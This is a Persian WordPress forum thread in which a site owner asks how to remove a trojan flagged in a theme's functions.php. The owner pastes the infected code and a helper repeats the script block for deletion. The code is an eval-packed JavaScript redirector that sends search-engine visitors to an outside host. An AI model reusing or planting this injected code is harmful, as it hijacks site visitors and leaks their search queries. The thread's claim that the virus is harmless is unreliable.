کمک برای حذف ویروس تم « انجمن وردپرس فارسی

ariarman

آفلاین
عضو
تعداد نوشته‌ها: ۱۱
تشکر شده: ۱ بار
# نوشته شده: ۱۱ سال پیش
۷ اسفند ۱۳۹۱ - ۱۶:۵۰

دوستان سلام
یه تم وردپرس دارم که هم آنتی ویروس خودم و هم آنتی ویروس هاست به این فایلش گیر میده
public_html/wp-content/themes/trl/functions.php JS.Trojan.Redir-5
چطوری باید این تروجانو پاک کنم؟
ایران وردپرس

آفلاین
عضو
تعداد نوشته‌ها: ۱۷۲۹
تشکر شده: ۹۵۲ بار
# نوشته شده: ۱۱ سال پیش
۸ اسفند ۱۳۹۱ - ۱۲:۴۶

درود .

منبع این که میگم و به اختصار هست ، از لینک زیر هست :

http://www.f-secure.com/v-descs/trojan_js_redirector.shtml

این ویروس ، که مضر نیست ، یک ویروس انتقال دهنده ی سایت به سایت دیگر از طریق JS یا همون جاوا اسکریپت هست .
آنتی ویروس ها با این دستورات مشکل دارند .

شما باید در function قالبتون دنبال کلمه ی dir یا امثال این بگردین تا بتونید بخش اون کد رو پیدا کنید و حذف کنید .

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
ariarman

سلام
این ویروس باعث میشه گوگل سایت رو block کنه
کدشو پیدا کردم
اما پاکش میکنم دیگه سایت بالا نمیاد
اینم کد

add_action('get_footer', 'add_sscounter');
	function add_sscounter(){
		 echo '<!--scounter-->';
		if(function_exists('is_user_logged_in')){
			if(time()%2 == 0 && !is_user_logged_in()){
				echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))
				</script>";
			}
		}

درود .

شما این بخش از کد بالا رو حذف کنید و تست کنید :

<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))
				</script>

وردپرس فارسی

انجمن

کمک برای حذف ویروس تم (۴ نوشته)

درباره‌ی این موضوع

برچسب‌ها